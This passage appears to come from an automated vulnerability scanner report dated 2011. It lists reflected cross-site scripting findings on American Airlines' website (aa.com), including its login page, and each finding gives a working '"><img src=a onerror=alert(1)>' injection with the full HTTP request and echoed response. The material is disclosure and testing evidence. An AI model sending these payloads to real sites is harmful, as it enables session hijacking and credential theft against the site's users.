This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/specialAssistance/healthAndWellbeing.jsp?anchorEvent=falsee513a"><img%20src%3da%20onerror%3dalert(1)>210b0fbc24c&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112320


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="anchorEvent" value="falsee513a"><img src=a onerror=alert(1)>210b0fbc24c" />
...[SNIP]...

1.61. https://www.aa.com/i18n/travelInformation/specialAssistance/healthAndWellbeing.jsp [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/specialAssistance/healthAndWellbeing.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 891f7"><img%20src%3da%20onerror%3dalert(1)>e539f7e8646 was submitted in the from parameter. This input was echoed as 891f7"><img src=a onerror=alert(1)>e539f7e8646 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/specialAssistance/healthAndWellbeing.jsp?anchorEvent=false&from=Nav891f7"><img%20src%3da%20onerror%3dalert(1)>e539f7e8646 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:40:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112320


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Nav891f7"><img src=a onerror=alert(1)>e539f7e8646" />
...[SNIP]...

1.62. https://www.aa.com/i18n/travelInformation/specialAssistance/healthAndWellbeing.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/specialAssistance/healthAndWellbeing.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fb5e"><img%20src%3da%20onerror%3dalert(1)>7699bb26335 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6fb5e"><img src=a onerror=alert(1)>7699bb26335 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/specialAssistance/healthAndWellbeing.jsp?6fb5e"><img%20src%3da%20onerror%3dalert(1)>7699bb26335=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112257


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="6fb5e"><img src=a onerror=alert(1)>7699bb26335" value="1" />
...[SNIP]...

1.63. https://www.aa.com/i18n/travelInformation/specialAssistance/travelingWhilePregnant.jsp [anchorEvent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/specialAssistance/travelingWhilePregnant.jsp

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6310e"><img%20src%3da%20onerror%3dalert(1)>caa4a6e54a was submitted in the anchorEvent parameter. This input was echoed as 6310e"><img src=a onerror=alert(1)>caa4a6e54a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/specialAssistance/travelingWhilePregnant.jsp?anchorEvent=false6310e"><img%20src%3da%20onerror%3dalert(1)>caa4a6e54a&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107012


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="anchorEvent" value="false6310e"><img src=a onerror=alert(1)>caa4a6e54a" />
...[SNIP]...

1.64. https://www.aa.com/i18n/travelInformation/specialAssistance/travelingWhilePregnant.jsp [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/specialAssistance/travelingWhilePregnant.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0a2a"><img%20src%3da%20onerror%3dalert(1)>89e1a7cf55f was submitted in the from parameter. This input was echoed as f0a2a"><img src=a onerror=alert(1)>89e1a7cf55f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/specialAssistance/travelingWhilePregnant.jsp?anchorEvent=false&from=Navf0a2a"><img%20src%3da%20onerror%3dalert(1)>89e1a7cf55f HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107013


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Navf0a2a"><img src=a onerror=alert(1)>89e1a7cf55f" />
...[SNIP]...

1.65. https://www.aa.com/i18n/travelInformation/specialAssistance/travelingWhilePregnant.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/specialAssistance/travelingWhilePregnant.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ecb0"><img%20src%3da%20onerror%3dalert(1)>5bb9a88a26c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6ecb0"><img src=a onerror=alert(1)>5bb9a88a26c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/specialAssistance/travelingWhilePregnant.jsp?6ecb0"><img%20src%3da%20onerror%3dalert(1)>5bb9a88a26c=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106950


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="6ecb0"><img src=a onerror=alert(1)>5bb9a88a26c" value="1" />
...[SNIP]...

1.66. https://www.aa.com/i18n/travelInformation/specialAssistance/travelingWithPets.jsp [anchorEvent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/specialAssistance/travelingWithPets.jsp

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ab3a"><img%20src%3da%20onerror%3dalert(1)>f365f3756c0 was submitted in the anchorEvent parameter. This input was echoed as 3ab3a"><img src=a onerror=alert(1)>f365f3756c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/specialAssistance/travelingWithPets.jsp?anchorEvent=false3ab3a"><img%20src%3da%20onerror%3dalert(1)>f365f3756c0&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137867


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="anchorEvent" value="false3ab3a"><img src=a onerror=alert(1)>f365f3756c0" />
...[SNIP]...

1.67. https://www.aa.com/i18n/travelInformation/specialAssistance/travelingWithPets.jsp [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/specialAssistance/travelingWithPets.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d6bb"><img%20src%3da%20onerror%3dalert(1)>5cc699bbb83 was submitted in the from parameter. This input was echoed as 7d6bb"><img src=a onerror=alert(1)>5cc699bbb83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/specialAssistance/travelingWithPets.jsp?anchorEvent=false&from=Nav7d6bb"><img%20src%3da%20onerror%3dalert(1)>5cc699bbb83 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137858


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Nav7d6bb"><img src=a onerror=alert(1)>5cc699bbb83" />
...[SNIP]...

1.68. https://www.aa.com/i18n/travelInformation/specialAssistance/travelingWithPets.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/specialAssistance/travelingWithPets.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e033b"><img%20src%3da%20onerror%3dalert(1)>71e7545c6a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e033b"><img src=a onerror=alert(1)>71e7545c6a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/specialAssistance/travelingWithPets.jsp?e033b"><img%20src%3da%20onerror%3dalert(1)>71e7545c6a9=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137804


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="e033b"><img src=a onerror=alert(1)>71e7545c6a9" value="1" />
...[SNIP]...

1.69. https://www.aa.com/i18n/travelInformation/tickets/main.jsp [anchorEvent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/tickets/main.jsp

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 178f5"><img%20src%3da%20onerror%3dalert(1)>727373ccdda was submitted in the anchorEvent parameter. This input was echoed as 178f5"><img src=a onerror=alert(1)>727373ccdda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/tickets/main.jsp?anchorEvent=false178f5"><img%20src%3da%20onerror%3dalert(1)>727373ccdda&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:40:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 105845


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="anchorEvent" value="false178f5"><img src=a onerror=alert(1)>727373ccdda" />
...[SNIP]...

1.70. https://www.aa.com/i18n/travelInformation/tickets/main.jsp [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/tickets/main.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2976"><img%20src%3da%20onerror%3dalert(1)>d6faf963344 was submitted in the from parameter. This input was echoed as d2976"><img src=a onerror=alert(1)>d6faf963344 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/tickets/main.jsp?anchorEvent=false&from=Navd2976"><img%20src%3da%20onerror%3dalert(1)>d6faf963344 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:40:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 105827


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Navd2976"><img src=a onerror=alert(1)>d6faf963344" />
...[SNIP]...

1.71. https://www.aa.com/i18n/travelInformation/tickets/main.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/tickets/main.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8956d"><img%20src%3da%20onerror%3dalert(1)>c3fa8a5f17b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8956d"><img src=a onerror=alert(1)>c3fa8a5f17b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/tickets/main.jsp?8956d"><img%20src%3da%20onerror%3dalert(1)>c3fa8a5f17b=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 105782


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="8956d"><img src=a onerror=alert(1)>c3fa8a5f17b" value="1" />
...[SNIP]...

1.72. https://www.aa.com/i18n/urls/rss.jsp [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/urls/rss.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f03e"><img%20src%3da%20onerror%3dalert(1)>ac1fc5cf381 was submitted in the from parameter. This input was echoed as 3f03e"><img src=a onerror=alert(1)>ac1fc5cf381 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/urls/rss.jsp?from=Nav3f03e"><img%20src%3da%20onerror%3dalert(1)>ac1fc5cf381 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:38:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118814


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Nav3f03e"><img src=a onerror=alert(1)>ac1fc5cf381" />
...[SNIP]...

1.73. https://www.aa.com/i18n/urls/rss.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/urls/rss.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66b13"><img%20src%3da%20onerror%3dalert(1)>c23a7540257 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66b13"><img src=a onerror=alert(1)>c23a7540257 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/urls/rss.jsp?66b13"><img%20src%3da%20onerror%3dalert(1)>c23a7540257=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:38:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118799


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="66b13"><img src=a onerror=alert(1)>c23a7540257" value="1" />
...[SNIP]...

1.74. https://www.aa.com/i18n/urls/westernunion.jsp [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/urls/westernunion.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec440"><img%20src%3da%20onerror%3dalert(1)>c52ff2e49cd was submitted in the from parameter. This input was echoed as ec440"><img src=a onerror=alert(1)>c52ff2e49cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/urls/westernunion.jsp?from=Navec440"><img%20src%3da%20onerror%3dalert(1)>c52ff2e49cd HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:38:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 111691


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Navec440"><img src=a onerror=alert(1)>c52ff2e49cd" />
...[SNIP]...

1.75. https://www.aa.com/i18n/urls/westernunion.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/urls/westernunion.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a83c"><img%20src%3da%20onerror%3dalert(1)>3c34ed2c5f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6a83c"><img src=a onerror=alert(1)>3c34ed2c5f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/urls/westernunion.jsp?6a83c"><img%20src%3da%20onerror%3dalert(1)>3c34ed2c5f0=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:38:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 111679


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="6a83c"><img src=a onerror=alert(1)>3c34ed2c5f0" value="1" />
...[SNIP]...

1.76. https://www.aa.com/i18n/utility/evoucher.jsp [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/utility/evoucher.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ca3a"><img%20src%3da%20onerror%3dalert(1)>85d02569aea was submitted in the from parameter. This input was echoed as 1ca3a"><img src=a onerror=alert(1)>85d02569aea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/utility/evoucher.jsp?from=Nav1ca3a"><img%20src%3da%20onerror%3dalert(1)>85d02569aea HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:38:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 111729


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Nav1ca3a"><img src=a onerror=alert(1)>85d02569aea" />
...[SNIP]...

1.77. https://www.aa.com/i18n/utility/evoucher.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/utility/evoucher.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e404"><img%20src%3da%20onerror%3dalert(1)>c082e077c79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e404"><img src=a onerror=alert(1)>c082e077c79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/utility/evoucher.jsp?4e404"><img%20src%3da%20onerror%3dalert(1)>c082e077c79=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:38:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 111708


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="4e404"><img src=a onerror=alert(1)>c082e077c79" value="1" />
...[SNIP]...

1.78. https://www.aa.com/i18n/utility/siteMap/siteMap.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/utility/siteMap/siteMap.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9febd"><img%20src%3da%20onerror%3dalert(1)>e2ab85aeddb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9febd"><img src=a onerror=alert(1)>e2ab85aeddb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/utility/siteMap/siteMap.jsp?9febd"><img%20src%3da%20onerror%3dalert(1)>e2ab85aeddb=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:38:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 149584


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="9febd"><img src=a onerror=alert(1)>e2ab85aeddb" value="1" />
...[SNIP]...

1.79. https://www.aa.com/login/loginAccess.do [bookingPathStateId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /login/loginAccess.do

Issue detail

The value of the bookingPathStateId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8713c"><img%20src%3da%20onerror%3dalert(1)>1300f2d82ce was submitted in the bookingPathStateId parameter. This input was echoed as 8713c"><img src=a onerror=alert(1)>1300f2d82ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /login/loginAccess.do?uri=%2flogin%2floginAccess.do&previousPage=%2fhomePage.do&bookingPathStateId=8713c"><img%20src%3da%20onerror%3dalert(1)>1300f2d82ce&marketId= HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: On-Demand Router/1.0
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Date: Sun, 13 Nov 2011 13:43:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000inrgXRN8pQ5zS31eJVmnqY8:15mbfaj65; Path=/
Set-Cookie: JSESSIONID=0000X4NAhgwKfefzXy4imvwGu5h:15mbfaj65; Path=/
Content-Length: 102381


<HTML>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<!-- Meta Tags -->
<meta http-equiv="Expires" content="0"/>
<meta http-equiv="Pragma" content="n
...[SNIP]...
<input type="hidden" name="bookingPathStateId" value="8713c"><img src=a onerror=alert(1)>1300f2d82ce" />
...[SNIP]...

1.80. https://www.aa.com/login/loginAccess.do [marketId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /login/loginAccess.do

Issue detail

